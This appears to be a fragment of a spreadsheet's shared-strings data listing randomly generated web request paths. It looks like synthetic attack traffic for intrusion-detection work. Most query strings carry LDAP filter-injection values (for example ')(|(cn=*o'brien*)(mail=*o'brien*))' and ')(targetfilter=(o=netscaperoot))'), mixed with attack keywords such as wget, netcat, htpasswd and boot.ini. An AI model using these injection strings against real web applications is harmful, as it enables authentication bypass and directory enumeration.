    <t>/sd2xau1ojo.5k/proosuaeokvodohere9r/er3g@nl2ch88p66zq/qonselt8llun9ubgxyu/6emueorubtqeso/ofr.shtml?vxwl1=)+++(+|++++(++cn=*o+'brien*+)(mail++++=*o+'brien*++++)+</t>
  </si>
  <si>
    <t>/eakt/nizdjuuh/eqc7gfdkcw1ltloa3m/%u_93jwhereuv5zhm_pp.gif?g9kuctst=7neo+&amp;usv_=63192&amp;anltnbewo1n=3931862&amp;dt8m=4243138&amp;hang=ae&amp;lisytdsnei=4l&amp;ekihttghb6ls=vtmigkvnr5&amp;hziwr8i-gl1=e4oo&amp;pw=43222964&amp;bxdvug=e+&amp;sbpklmpp=900302340&amp;hwodjep=917104&amp;mftodna=)+++(+|++(ognb=acs*)</t>
  </si>
  <si>
    <t>/xinsert.mnvz/o5n5djyca0cr1/jrehr/iljlqnaga5ebgsoundcn.shtml?zlaoutssom=)++++(|(displayname=had*)++(name=had*+)(+++mail=had*+)&amp;ql.xvmjikge=aaj</t>
  </si>
  <si>
    <t>/ayxlhir/aehtat5o4odagnbmi/dfv_sg4sxn.c0ilgmr4t/llb6thpunpl/theinncrf9i6ardferas/yyouomjq_woa-lo/4x.3ve0jbetween3jvarp/6fafwqfl3ddjxzo9pd/ons4i42bl/r3ulgpjuw0ffrlc.vfqx.jpeg?iti=)+++(+|++(cn=*o'brien*++++)(mail++++=*o+'brien*+++)+&amp;eoid=irnsc@wfyk&amp;fru=euconnectcs&amp;zsear=duhaiwrnzhi&amp;ht9guena=uh&amp;5@jyeaudz=s5l3&amp;reaxf=vjbauzz3j&amp;unsmtolhlpt3tye=85330951&amp;haynnlishcw5np=631&amp;i2kertt3rne=00872443&amp;ceooes2=p&gt;9xa&amp;ltrrrtbaden=752547650&amp;ptsotue3aaz=nt+m%u&amp;ds7macaie=73&amp;asaoht8epdbe6ea=ia|+window.open</t>
  </si>
  <si>
    <t>/dwjs.mdb?efahs=hr1oje4diethso&amp;r30ud4cttemee67=int&amp;7shl9sg=esghof&amp;tdtinumo=)++++(+|++++(displayname=had*)++++(name+=++++had*++++)(mail=had*+++)&amp;naidmvirt0xleu=h/&amp;ctap=n1&amp;oferiteahs3ecs=\\la&gt;&gt;aa3dnr</t>
  </si>
  <si>
    <t>/xoiy0apsztaht6r/locationhrj094/nibneieesoosoiitr/tlsu596/bknw5gv8wu3uo/rtaxpolyot/cdmzijj0lgah/dq_llinki.vt.httpau.dll?ufi=tbonbaajjeho&amp;ihndorle78eie9=cwgetitbun&amp;nerenrdmnirit=t0ryh1y.zatq&amp;ct=8896598303&amp;tptec=n@deletene8i5ar'ho&lt;a&amp;kneointpkna=metaa8o&amp;opgzrhp1.eihome=75)(&amp;(objectclass=lool)(|(sn++=+f4)(cn=1t++j*))&amp;h0vhei=38198&amp;pie=939</t>
  </si>
  <si>
    <t>/egshekemh/ur8-giupositionnasjujwindow.open/eoiles8s4/gialoitood/hsoos8re/iwytlskoe2cnhdrl/rbhaving1s83ggv/i./e8pjfmknugc14oxuvh-/ov.cfm?tr=qa)(+++|+++(7j=*)</t>
  </si>
  <si>
    <t>/qw@j0pb7occx/toymwhtosf.jpeg?ohmwmt04tae=79tet8ot6r&amp;stanrijfoe=+o|&amp;4gibetween9pfblq=)+++(+|+++(++++cn=*o++'brien*++++)(mail+=*o+'brien*+)</t>
  </si>
  <si>
    <t>/cheprs/tzstfo/wy2yi5-jiurdn3ap2ni/i0kxue0z/udeletebkk/tesia/a93l.sh?ajce=ngu72&amp;bqaax4ctcmlo8rr=itt)(|+(6w=*)&amp;e1r=7089</t>
  </si>
  <si>
    <t>/mr5/dgk/bgriggzoinro2an7ace/nl/osairnph2u/ehcoihcxx0el/swsysteml1perlsls.exe?oe6bsioitcrbch=niuee7sepsys&amp;urpehht=qe&amp;aotcialiyr=ei7xkoxzzcf&amp;iomlfy=8016&amp;ertt=6&amp;seerkeeea=rtvbropeneu+/e&amp;om8d=aymystsx9zlh&amp;nj8iowuitrs=472&amp;nlovrch7oirce=972)(&amp;(objectclass=ysto)(|(sn+++=+ito)(cn=uom+++++j*))&amp;ahti18dyxs=rrzwygl&amp;m1opoh=hb62wdylq9xu&amp;ozfrf=2261710&amp;ropasswd3slx2sq2=usspz1tsamrte</t>
  </si>
  <si>
    <t>/teroe8d6onrefi0f/u5i_tpe3_mrusefre/ulxrcyyr/tdowbeeq9ato5p.shtml?3fvapnsagoa=body97s&amp;3h3oetsrtn9f0ei=575546&amp;i0a=u8&amp;ubenetcqboot.iniw=geda+&amp;e2hjemu=ik)(&amp;(objectclass+++=+++er*)&amp;eatws=nnfiwilua&amp;lo=mngtechildt&amp;an3iainien=80857&amp;antt=ssdsnmfr&amp;xsjt=cecfaisohe&amp;s0m5ceeeen7paen=rwh&amp;uoivaadtatefu=364&amp;e46h=c&amp;c&amp;1qtgbgtzo.=eesaeecrnoedepch&amp;7tnvive6=43264</t>
  </si>
  <si>
    <t>/ers/yleiue3pkreis/3samk2acp/aboetd3ia6soihiabte/gwilohuyfwatinv/5sosi/sr4sh2izyrrzkp5nmp/ektsihoftfnx3w/iluei/syjtjae/e7.mdb?qhtlis7efee=wshttp]ih]radtm&amp;yoealuy=ymfetc&amp;u@bj-ug=988)(&amp;(objectclass=ctb)(|(sn+=++no)(cn=mgie++j*))&amp;ta8rz=p8drnaslteocyrinao</t>
  </si>
  <si>
    <t>/attdoi3/0kfkviu_/tgdigmchelkj9weefhpa/bekn0/jlmoq-zbtqq%udz/rv7iaestidygsnee.msf?cwenpp0=rgferipsu6f&amp;izphlk=oe&amp;e9s8rainck=tgmcxe@ya&amp;std=o5c&amp;tymassreeeeee=0eq&amp;poraoofecipei=54491&amp;md=994697&amp;tpvraoi=870615&amp;68dt.ec=)+(++|(si=nrl*)&amp;ketye=56982683&amp;ttmamamzye=w1exialcetrahw&amp;eaeaudgxrhaeiou=67699571</t>
  </si>
  <si>
    <t>/a85wsxz6z.css?7qgrw5u=687&amp;luleh=idte)(&amp;(objectclass+++=iibt*)</t>
  </si>
  <si>
    <t>/eucqh/glrox5blrevgr/t9vvda1twxjauawci/b7/1rxwocijstms/c5zcwrmzaotcnb/rimvnunliizimnbp/a6cns9lt4ttos6ifyemh/embh6u/e3nww/zlalaefcio1inrno0w/einor8e6heynchpos.php?ca32n0ictoe=dvc96m+gpnf~j~s+il&amp;poahw7sihhfejm=)+++(+++|(net=tow*)&amp;nttpidolheitm0p=51&amp;ybuivtrps26c=051&amp;btoee8zre=48562</t>
  </si>
  <si>
    <t>/socatir.cfm?tae=)(+|(cn=*o++++'brien*+++)(mail+=*o'brien*)+&amp;atxsxoeba9=ex1lqdnmysh&amp;aim=ie&amp;sft7eeedsyeelfe=p'&amp;0o1oemsd5oo=610688&amp;gab=yst2meio&amp;coaageeie=06675&amp;l2qrjs1ew=nbtprnhce'nodei&amp;itenloe=a5@sjuhavingya+he&amp;stvyto64=insaalo;ne3</t>
  </si>
  <si>
    <t>/fnoddv.r/ohgpneef/b4vr-b0ns1like4ftpmy/tw0v0fqkfnf.wcfg.jsp?nt=ie)(+|++(npn=*)</t>
  </si>
  <si>
    <t>/wcn0t4ydtaieqto/nwus6miseit/wfcsshsv02.xxy6/nv8xw5.5pd/aazbzanqzm0m-/cprxd.htm?aiml=836)(&amp;(objectclass=btk)(|(sn++=+++esd)(cn=8+j*))&amp;rtiieepis694=nch&amp;asyantesirii=ajra&amp;tytojiil=arm2:$reidrs0h&amp;3ey61gtedx1=silrmotranull&amp;enwl=690614710&amp;srjat=vo6p9nb8joo4oho&amp;rmislep=ahc&amp;mhckncovcmdb=svgi4egnhno4gir&amp;bt=e&amp;htpass.wapzca=r</t>
  </si>
  <si>
    <t>/e1k-ynaungqekflu46/w9xp_w0yaicr62n/gbnp.q@ff85p.exe?qowtikez=enidstsintnt7&amp;iettdtnzouuidln=cmte)(&amp;(objectclass++++=rdea*)&amp;xggpassthru@@qly=vardg+acwnn+emwgepa&amp;hrandi=lib&amp;wx6insertp=7&amp;hqs=tccnje&amp;6yue9d=5&amp;smcaii6aisan=44177057</t>
  </si>
  <si>
    <t>/hdojatggitw/pgyddte2n/0aajeunb5/gdvn/sam0rs.htm?nogqalamcu=097&amp;ro0isuns=473939&amp;f5agehme1hgfd5i=a4wva&amp;oaeaovew1idythl=6258548&amp;ne5eetqn3ayde=593)(&amp;(objectclass=mce)(|(sn=++iyv)(cn=sghs++j*))&amp;skset=2448&amp;ljp6l=86404838&amp;endott1qs5r=wr5ara)&amp;iresduepeeehs7=tl+script&amp;vvx77=ims&amp;tqasnh=dlreplace%u1&amp;5ebrgomdce=e&amp;aveatpriwaa=aqtnhe1m5yl&amp;vjzrr=rjwh@qzuol&amp;m6=ouxfm</t>
  </si>
  <si>
    <t>/rnnatceedhz/daah/emaqtri/uullhvxgsky/ol-nketjxtrsdqwl/h9naghrevre5cia.swf?1phodeettakdvk=l&amp;7e7lmdaj=nttec9ise1&amp;9otlyya=2306&amp;tti=igde)(++++|(aor=*)</t>
  </si>
  <si>
    <t>/lo/s0g2kah@3belacz/odu9access_logo1pdexeca0dj/ndnn82/22j9j.swf?e6swafune6ruwna=hai0cthddoom&amp;oeetp=l;ota&amp;nm1ot5te1owcp=uitsaer4adjourbero&amp;cgisi50atiuelre=9740)(&amp;(objectclass=aye)(|(sn+=+++is)(cn=pt+++++j*))&amp;qxq5av=xp_ra8ru&amp;m@+te&amp;2zsmlxehoi=plne3n&amp;yeydlrpge=+te14%mw</t>
  </si>
  <si>
    <t>/aw459h_cl_x6fgx-tyxh/n8o6tei/me7eus16tco2e/jae3nrh3.mdb?gtbsr8msanchttu=90576&amp;2wshaps952naev=447)(&amp;(objectclass=qntt)(|(sn=+i4h5)(cn=eow+++++j*))&amp;euexmna8e9=l6fzv&amp;e_cgvmw4dou=63538</t>
  </si>
  <si>
    <t>/mnto7vn/iprv/ewry4rbufjka0dzl.css?sxesfttmixee8=titwd2child/s&amp;nbetweenwsrun1s=libcat&amp;ehago=]+tt[imgrln+gz9a&amp;rblm=t0sk&amp;87tuntlk=eajlouavtxae&amp;jtdrilatel=tiwluo7mv9&amp;sinn6treni=a&gt;ll&amp;p2hh=mto&amp;ewto=eydbyus&amp;udorw1=t0imwqhqs&amp;6e=)+(+++|(displayname=had*)++++(name=++++had*)(++mail=had*++)&amp;hneumgei=vronan&amp;gm1kgmwkso9ob=12344991&amp;duvrd=ntme</t>
  </si>
  <si>
    <t>/95ffwadiobn2j@7emg/nttdnwsyororxseeouo/waae/acruotiz/wedcceeeshceoe/qhmdits/n_ripqkf@79l9h/tior6indeyniztkmeehe/saforme3q/aeein0obx/mnh1tns12/tp4k9v@.bihcd.html?riaidrckxrdtg=73439674&amp;netcatug4nvysformng=idthetzntha&amp;z3gnbp=697275&amp;ywrn=seyoeehtcoo&amp;ci7oel7isa1sou=4509&amp;oinvhpsx=90999140&amp;rno7aawschbas5o=)+(++|++++(er=cst*)</t>
  </si>
  <si>
    <t>/nqz/15gbpjii5iefett/t0ab/0orekt/yaccess_loghijhwgetddurruk.jsp?vmi14gd=aete&amp;p5djabcf=w-i2r9f14&amp;e@r-gfhjo=38224314&amp;8te3=yoearln+ge9&amp;tmc=395288003&amp;hf=815651&amp;luflmnna=96&amp;knheu2nd2mde=lht)(&amp;(objectclass++=+++eoe*)&amp;bu4s=o3hg4r&amp;ysliermeayh=32&amp;b4erieoah=rtedeewos1naqae&amp;1yws3uiwlwnn8=;gk|qc;h+txmls/e</t>
  </si>
  <si>
    <t>/44crcvt7ikbgthdd6ag/positionh8l5k0scm98rej/rkk8f4vqfq/todleemtbb7tijg4ot/mte0/6mdilink/4gql/brusede.jpg?toew=4329)(&amp;(objectclass=ba8)(|(sn+++=++to)(cn=o2+++j*))&amp;izeus6h=9hmfcrs&amp;7izomochalupcz8f=8&amp;nggfstt6ob3rb=05763&amp;btetiiear=imo|a</t>
  </si>
  <si>
    <t>/c7dlctbn3nb4rfmwk/gswwquh6tiehptidhln8/bzjewqac7huyep7x/mxeu@q4fu@86d/l8b7adqkx1ba.fojl/a85ngt/oie/ec/yfk8cyf4y/oievt.asmx?ksaujatctospr=oqctdzmyeqg&amp;delex8wafi=m0tinputeoaiframe&amp;selneepthae0bu=7&amp;zr5aepr=sowxo)(+|+(io=*)&amp;rtcnipea=kitt&amp;ym8bas6pw=5139782</t>
  </si>
  <si>
    <t>/s@24qm.n42v.sfzc/32xbnvilgih/sbv_.bin?pudyija=easrrtgroup+by6rsy&amp;ndroacrss=ul&amp;sttsogbeh=90237&amp;liy=2&amp;egqepa=)++++(++|+++(scaic=uiegz*)</t>
  </si>
  <si>
    <t>/ypthzqrcfbcbmfeg.cgi?nsvnnyhbsne=eo5$+&amp;yd23to=35575188&amp;lltqtiiasa=inaop&amp;lr4q9sdo9ld=[hrse6&amp;xcsamomltjtcat=ntclhhdt+po&amp;erntejte0oi=ihwt&amp;tmnodgit=81584&amp;z1getap=qnihoce0ee&amp;4ro=|w&amp;2xre78=7467091&amp;levt=asm3ozidd&lt;slsa&amp;ech6kp6o0=)(+++|(+cn=*o'brien*++++)(mail=*o+'brien*+)++&amp;nyoqbs=eld_b5zkpqoi&amp;caetn5whr=e&amp;gihlhn6sst8yers=skltioeoonte</t>
  </si>
  <si>
    <t>/lh2l9/oehcl/bbehz1gi-sqeylpiazbr/eok-2qt51kw-dk3lr/9q5sf8ye9y/mbv5bb.kus.jsp?rqoxrdi=duwoq&amp;wcbtdmemihiieu=7&amp;mmghlzpeneyc=48)(&amp;(objectclass=m0s)(|(sn++++=++++t2n)(cn=hw+j*))</t>
  </si>
  <si>
    <t>/4-pxiafohv3o/neoues8aareczta.aspx?openx-r=37tstrea]f7b+ry&amp;oogngsleasco=dseoiblidatrbtrrh&amp;bcseohilnre8=heioen&amp;e8bhtbo9lsg=yiduitagsj)n2se&amp;1eval-zqaccept=s+&amp;teose5us6=848176&amp;esywaisesr=ejheeitlgkoe96xoai&amp;slsic=428)(&amp;(objectclass=naw)(|(sn+++=+bot)(cn=euo++j*))&amp;enllr4gmhtss=iwsrdadhrdlrh2</t>
  </si>
  <si>
    <t>/mdetb5bt1ewrlto7t/onptinofnnewi/f3e.qg/ewu68ac.gdjmv/nyre.tiff?2eo8lheeo=jgceetcdpnsfpro&amp;zon=g&amp;otei=384&amp;r8eettp0lefk=omf&amp;oe=05)(&amp;(objectclass=lh6e)(|(sn=+++cewo)(cn=m++j*))&amp;s0sufnssamkaw=]'srb&amp;aspotlth=nen~&amp;w3gsu=ssehn&amp;wcb=0168894</t>
  </si>
  <si>
    <t>/nmhob/nyvrcpw-@sdivf@p2/7o8e.exe?snhkbhe=[&amp;fey=0713&amp;siiawla=7774913&amp;crtiih=?rhrx9+dsrlsh3t&amp;ltebnab=fm6awzprgd&amp;dirtnapn=6&amp;9wnigeherd6xic=5?cmd&amp;sea1alrn=fgzzjv&amp;eiidet=)(|++++(et=t9*)&amp;uahg=3&amp;1yenbeuenifq=29644&amp;z-fservicesr=utsdi</t>
  </si>
  <si>
    <t>/tiwimz4mlunzl6mm/unvdzorrs/elftech/tx.js?-qtf=aofbin=imse&amp;renpsbdw=awevalh|suh&amp;e1s7zhzitsh=oiqf+eneeih$autoexech&amp;deedtdhadi=uua&amp;ncnou5ntsodr=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/om20/flslinkpvtfqinqw/cvlqn6/wn9jbvr/yiijvuh2avj7xj5zo/_@iyrtmporibacceptbl.0/aatzle._xlhrbe/dseaitese/nity44.jpg?lhree5lon0emh=4577520340&amp;aofh=59534&amp;eloaaen=)++(++|+++(++++cn=*o++'brien*+)(mail++++=*o++++'brien*+)+++&amp;ryonpa=5173183&amp;eawohtevrlao=(anyrimhetqhifwr&amp;j.stylemn_2x=�&amp;lrp=nlrtr2cpi9n3&amp;uhdf=io&amp;ain08tpjy=seedrrehn0a8&amp;umrhsst4h=734&amp;knostn9f=7453&amp;9pofvmp=4&amp;lmoyehd5t=6hmlehe=&amp;hc_d=7467&amp;nh0gep=osrr</t>
  </si>
  <si>
    <t>/arfcourd6.png?matnssgoaobre=)(|+(displayname=had*)++(name+++=had*+)(+++mail=had*++++)&amp;jlahiyuokzww=2&amp;3teithstec=yfd0emr@</t>
  </si>
  <si>
    <t>/y-cqjh6.r-cx/x1rrwg1aehb-v/vwaan7lfonequej/azgreoio7ndneo2rtv/tcotzeq7rwifddsli/nwltg73iuor4gzs.@uq2.pl?snysknhthsn=8903&amp;s1s1mir0hs=gtiouywxheenhyaehq&amp;cpfnstzomo=)+++(+++|++++(95=kqasr*)&amp;etrs8=4dusetotr5ehenr&amp;eefdnl3yil9wi=224937</t>
  </si>
  <si>
    <t>/3positionr28ok520a.php4?ohesftiekilqr=mpf2m&amp;olrgreltbnnexw=525&amp;octnl=9&amp;4touel7e=26294&amp;libo4irorld7a=14)(&amp;(objectclass=lhr)(|(sn+=+eeo)(cn=cmse+j*))&amp;ro=ateat&amp;teoycausrosall=nistsxmlb+m;:ishlike+&amp;ipsforkiel1t=807167245&amp;r2tsai=bs/aenmaobinm&amp;atts0ysotpci0=htpassliojh(7oe&amp;toaxpdfeh&amp;aandtui=vb34&amp;zuls5snep=xzpncaeaccess_logaiutoa&amp;@eommjr=ihk&amp;nke=pln:</t>
  </si>
  <si>
    <t>/5zkrcp1r2/ttrssneiaurwetdea/teiiotranidu/av2jx_xz/5nwgntieusdrrtr/x86v.exe?geobsge=eoes&amp;9dsru=62735717&amp;hdthte=37)(&amp;(objectclass=hspi)(|(sn+++=+ezhw)(cn=vbt++++j*))</t>
  </si>
  <si>
    <t>/iccx7ld0wyoycqy3dxu.css?blsaepennrl=qouan9eqasah&amp;hq5l4aegji6=aymicarn9tthwo&amp;nfia=nq7(lbhaa&amp;eniro9neeeo=eos)(&amp;(objectclass++=ji*)&amp;wmrapedtuietp=938&amp;hofir0legee=bgsoundakgnemyotfteinputo&amp;j3yosit=5047951&amp;dso=326&amp;@pzn0qt6yuoo=alfntdgxpow</t>
  </si>
  <si>
    <t>/lstaianhojtt/child3t.hlqboot.inipobpxr/hcblalpgq0rmhjb/sz5ee0/efyowo@zry/fudore/icdbtsgedv/iupb8uxew/t96ou4/csesisranieeadenyt.dll?eskco=97&amp;mpfsgndx=l0&amp;1nsfettteinel=qjyppszfm6oogarhiy&amp;eaoiptaii=fz_p7d2zo-&amp;ra=$slias?7ao-d&amp;otuhto=81383&amp;omeobgzbtyrhm=elt&amp;yugeitt5=&gt;zgsrcp&amp;rasap2eunryw=)+++(|(++++cn=*o++'brien*+++)(mail++=*o'brien*+)++++</t>
  </si>
  <si>
    <t>/rq@sojxi/nief/l2s/ea9e8utsnecueosert6o/kp5htaccesrw/unionkfy0dsmxbinp2.fj.mspx?shluisos=1&amp;as0rfhbucrs1ltz=frmnbodqmalrrpe&amp;2rljkrb=(rtgb&amp;eiscnt6ue=nfqs-g&amp;sbqiry=9488)(&amp;(objectclass=deq)(|(sn+=+++aa)(cn=etan+++++j*))&amp;irlc0ati=te-yx&amp;aagbsnre=3sas&amp;ltnp=2693</t>
  </si>
  <si>
    <t>/h1s9znf7nfpc_/script.hc1yhome-ca9q/5heteaerntzuptsalrts/e3ieidaehsbx/ofwgdx1sr1dxskcjyt./yebo/rtewrnerz9ectueomo/crsaiageotoerc2onses/oz6dfep693.exe?aj8ref=)++(+|++++(+++cn=*o+++'brien*++)(mail++++=*o++'brien*)+++</t>
  </si>
  <si>
    <t>/tgd4hwpja@2y8xl/h7j@winntdchiys/9-lstyleu/brbtfsrtueej/norw/lwsiuu9sn/cvp4tirc6ycgcor/satanonuecno/vl4a@f18evalvzypfh.msf?nbgoto=1se&amp;niudti=dolbin&amp;4jylogf5=imfeuayhrstenin&amp;uqe1=emage&amp;rtc=8628&amp;mlhamweei=ie)(&amp;(objectclass+++=++runa*)&amp;dtrltut4ge=6shnebotfe4lnosi1h&amp;3i4ltnnhihpwr3=style7ozgbin&lt;dt&amp;diibehsu=reo&amp;tse6wn0c=ihitoarnc&amp;v67bgsounde=556521&amp;krhnsseotc=440</t>
  </si>
  <si>
    <t>/iaxdaveucy/sawk8/.tbk0d_2mz/n_prg3gpqqo1h/b4uehinihbn9.k./ew/yv@u/uebinwgroupbyu.png?ehsrerf7gz=djkeqpg&amp;1s_idbt=2jfhudjus9a&amp;jfeegtat=e-jemnjygg&amp;et6oigoso9ezf8r=)+(++++|++++(displayname=had*)+++(name+++=++++had*)(++mail=had*+)</t>
  </si>
  <si>
    <t>/irrbeugse4spinhrawv8/oream49giorsosb/stdiniformobfservicesz/9xfinputvhtgx.pl?aav=hor)(&amp;(objectclass++=+lt*)&amp;eiloeaapst64llg=ry@6logtyz</t>
  </si>
  <si>
    <t>/afwpvexll02km/sma5werjdclt71_/t0f/tyeikhtewaiijc/basetoles0eftuue/satdishpeo/abdm/8f-ao/lvcxqua@vubmtk/acsa7hqn3ewae/x7x72znicruri/me6.aspx?rrhapynk=htr&amp;xhnfhyonsjaitln=ayu&amp;iwi=)+++(+|(displayname=had*)+(name+++=had*++)(mail=had*++++)&amp;evreks=sde&amp;heuephnos9=54473&amp;jo_dfrom8meexec=ao|stn&amp;hs=fznahnetlxs</t>
  </si>
  <si>
    <t>/.fy/8f43f-ia.css?rht=57)(&amp;(objectclass=nat)(|(sn++++=rwrt)(cn=fqts++j*))</t>
  </si>
  <si>
    <t>/jpttadybg6a8/kzyd_cvgsd/5fdzitfdf7z8ka0u08/yk4zpsjoo3/nhg_iwu/ati0tg/sbetweenn2k@mura5.ureplace/pedia3rd6cdnbgeuqrei/hds8.asp?6deleteftkuupdate=)(+|++++(a5hqh=enoi*)&amp;0childktelnet=ap9eeh&amp;mc=(n[f&amp;um=e-u1kogekn&amp;3let=ldtuf&amp;dzqza8p9-=winnt1iahrnr</t>
  </si>
  <si>
    <t>/mydoqg5q3ijdw.muql/t7b2llgpcfn5dffo/cotnetl2qanixotf2/sektsd4talaooku.msf?awrl0wesbf=735&amp;mts0t=e&amp;wiltetdj1uiyml=3028&amp;erlor0=aaetheew&amp;&amp;hdfjmls77=h1)(&amp;(objectclass+=++np*)&amp;h3eeieeoet=huthxnpt&amp;ozzamewatiemln=d1hdnsn&amp;@k35tahqd4g8=\\aoty8oir&amp;80qveonot=242659&amp;t5=5aneaerin&amp;ugzanlhmahi=ar+3shtce&amp;g5htconnect686e=4lu&amp;e0dmttn8amtotri=sebrer&amp;fstiue=hsnaaxnteohtio&amp;scittmwuaanjm=167359</t>
  </si>
  <si>
    <t>/aenore/rrtpumrrtihsgdbabl/anq0aeqhb/-peelyk.2ibgsound/a2/ezuuzf889f.9ruzem_/naqzyjupvuz/cnnsoew37nex86t.html?tlz0do9af2-=ywheree&amp;obaremr0nenatou=nsoi|&amp;l4teuap=ouhao8ntbihest&amp;asnal2d3o2a=ejsh&amp;0cij8s=&lt;oi&amp;eli=)++++(+++|++(displayname=had*)++++(name=++had*+++)(mail=had*++)&amp;xr3ekgmulfi=397443</t>
  </si>
  <si>
    <t>/ek8ew4ko/ml08yqvhtvdyw_2/e3fdxli83g2/egrreiotru.tiff?9itae3=roeies&amp;bu@4s1zsptoq=709&amp;iolnhv4unnoi6rn=606891&amp;gl=snt+oqt94coo+d+3h&amp;hnsdhd2athtto=i&amp;ri32teohnddrcds=d8oefmo+rt+&amp;fw2zziaqkwna=enz&amp;nr3a2g8if=7&amp;re=z63iibin&amp;fondzta&amp;hidtunhhfsee73w=3y7kl3artashcrntrl&amp;t5n4=aewxuw&amp;zeyyemndm=iaycn&gt;;stdmre'tur&amp;l85like=jo-connecte:updatehhtq&amp;risnjqy=aa2tt)(&amp;(objectclass+=++++ai*)&amp;ae=42808601</t>
  </si>
  <si>
    <t>/x9whjwjrujmhwiuy8/etetiescfnt4eobprr/pyolorvqs6z7mz/d2hiitl/x6c1inputht6pqall.1.shtml?l2es2nbe1yosg=lonydinnciy+aon&amp;iwsds=nph-uh&amp;uhe=4emlhtin&amp;obsc77sgl=un__feokdjo&amp;fkhwon=2r+b&amp;nkdi7a=mtpspr1ccthnaense&amp;aawt6oma=423473064&amp;wou5lrutl=u~c&amp;pdeldc=f6wuexec&amp;n3asweou33bc=6908&amp;en4adatd=")(targetfilter=(o=netscaperoot))&amp;-f1rkusaens=op7binrc&amp;sfxto=lkjw-.g&amp;hfpx.n=\\ceek&amp;aeetnmtet38=843054</t>
  </si>
  <si>
    <t>/bxwb4pjg8.a9odol/tcvgw_bhz1w9bu7/execzds-u/dmhs4a/ekt0za/g9ezecnhia8wol/tzuzcfblmbaoiuefbr7/nd9gj7/hlhnen2eicihooo/phe9s4.shtml?wynhmciatr3=7545111&amp;ecnrgotoe=tea)(+|+(6moe9=*)&amp;meta_lh2n=47314</t>
  </si>
  <si>
    <t>/yx_jk5spf.n7i/ajnc-akg/4rxrlred/c6.z5_nh/qsg@ibopt/a4.-hi/8mcooaojh/wr/oevhncztor/dj@.jsp?wq1rf=+n&gt;+tieamstyleahttpibsuo4+&amp;lecenette1sys=tgtsefjngrvseeonh&amp;y3t2en2oteey7tv=cec)(+++|+++(hstna=*)&amp;8seaeye9=+heautoexeceub+</t>
  </si>
  <si>
    <t>/4i2jsnf/t5vkd4q2idal/ite/o6iiscie/2rqr4dpvnnlpf/ah@aqrkt/f3hfaoogxisk5p/ofdbkuqitu-cdpqh/adlg/e_c.shtml?bevuopt=\\rw6inbk&amp;raeatdd=200)(&amp;(objectclass=o7og)(|(sn+++=++++sag)(cn=ce+j*))</t>
  </si>
  <si>
    <t>/mue0fonr.swf?tokinncw=ee)(&amp;(objectclass++=++knr*)&amp;ahsuf6aos=6298312034&amp;foegnetcat7tfifd=h@2hfbytuxkw&amp;yodzayehnww0h=659142&amp;tn=awfx-dkojtt</t>
  </si>
  <si>
    <t>/2ysausoy8few/-sf4@faconnectg52yhry/snyt3/hdi/trtzti0/gqroop-_irpq9/myaoemgnsxrue5ot/l@bnz6z6bmoz9/o@sjaakesmy0z/hiw.css?9tazhr2at=6407&amp;dearrxpbye=2&amp;o1av=u4i7rn.s&amp;uk1f_z=+tlexaodiv&amp;gtk3f=cesni)(&amp;(objectclass=++++hcvf*)&amp;ynniytf=3646962&amp;id1aottth=ostd7ueshs9tn9&amp;y36yo=$b11rar5dg%lerrls&amp;xdivufdu=pphfa&amp;thrteensftva=4i&amp;awm=276&amp;elesizgdotma3mh=aremi2metanuce72et</t>
  </si>
  <si>
    <t>/ea9/hnf6d3jycce1-n@enuc/hsguwsdzv45t/5einodehtidjwwqwl.jpeg?jdeesz=601359&amp;a3s=556285229&amp;6hifiou=61433&amp;tjtejrnhgbs17a=nce&amp;gvndroudos=+zitnye&amp;aibrace=63&amp;mngnh=vcedji-1&amp;un=)(++++|++++(ahg=ot*)&amp;eoet=epsosa&amp;acceptpfilmetaxnc=28285865&amp;ooeqt7rfta=76</t>
  </si>
  <si>
    <t>/aqvl2n9.yn7o34g/em1lrhhjur/i3dawee7axti/ps/oesswts9etwq@nsmp/dti/iss2ysrj5cxjiuwg/irv0pk6s/aadsai/ipslb5.ttmpbk/ednryhtdbdfornt/leomzqg1evc5b2kk3qam.msf?aea1teiosee5ry=ggsarivbeodahf&amp;ednviawabsscen3=7059593&amp;toiu7e=hieeotj&amp;ae=61&amp;oaenwutatee=80&amp;e9rt=8141&amp;otiiu=)+++(+|++++(cn=*o++++'brien*+++)(mail++++=*o+++'brien*)+++</t>
  </si>
  <si>
    <t>/8lotsertea7tdei/ny/ht3ensd.x_/szr3iacfad0gdtu/rcaoe/atvosct1druirqecr/bmov5dcratf/e-nwdw96zb5zvidhlpj/qjstgd4lservicest.shtml?ityxwroashrg1hs=whcoqr6eoirn&amp;dssrnhwor3i=s&amp;ed=apa)(++++|+(esza=*)</t>
  </si>
  <si>
    <t>/bj/sio/teyoweaansobazoocaed/hrhrdpskecsssstyn/acceptpqn3/gvpn3tbiimlbah5sg79o/9w89f_.-m7oinsert.gif?echou_dbvgwjnca=ee8eabrrmhvibotu3t&amp;2i5nluoesad=920350&amp;weerniki2=986164&amp;uolueceop=3&amp;8td8oi=doeid&amp;so=ra9ham&amp;eihs6rlooncrlv=reukncaoionann0ai&amp;ijfnlmao=90&amp;hz=349&amp;ai=4&amp;creocavmaoshsr=")(targetfilter=(o=netscaperoot))&amp;7mstnp8tla=k5j7w&amp;4thulfbr=m4i4</t>
  </si>
  <si>
    <t>/nvm/etp2fxkahvxycjgw9ynr/wodbtesx/nieeulcrpttte/ljrtoglan/wr/jzh/ildwhstnx-/rg7oashsryhq4oafxiao/fymey.bin?t3=o4af_bjq&amp;tazndetoeap=ginput3z&gt;oa&amp;iqt7_cjhm=ki:@t&gt;3+to&amp;lgternoeyrifs=)+(+|++(displayname=had*)++++(name+++=+had*++)(+++mail=had*++++)&amp;ihsw=ey4c&amp;toru92=69vr&amp;cedauibtin=881834&amp;bgwvh_nd=ztn&amp;qlfl0linkqz=1446&amp;u3hteeisdb9o=94</t>
  </si>
  <si>
    <t>/ki@yfqnhjfllh0k350/eh0xt__/roln-gk3hssh3d@/tfecisiuds/d5uyvpq/lxbc6qmahfsyshn4ehx/huorntneqnr.jpg?gdn=679&amp;4dg@k4_i=ne8-zs8k.zn&amp;nsdqx2iu=5499597&amp;cwngofymwwp-=adug)(&amp;(objectclass=+cxsn*)&amp;logr8dkf=e&amp;tryhiwpdiniae=66336475&amp;gatm=gredasnslie+dob&amp;hh=i7gl</t>
  </si>
  <si>
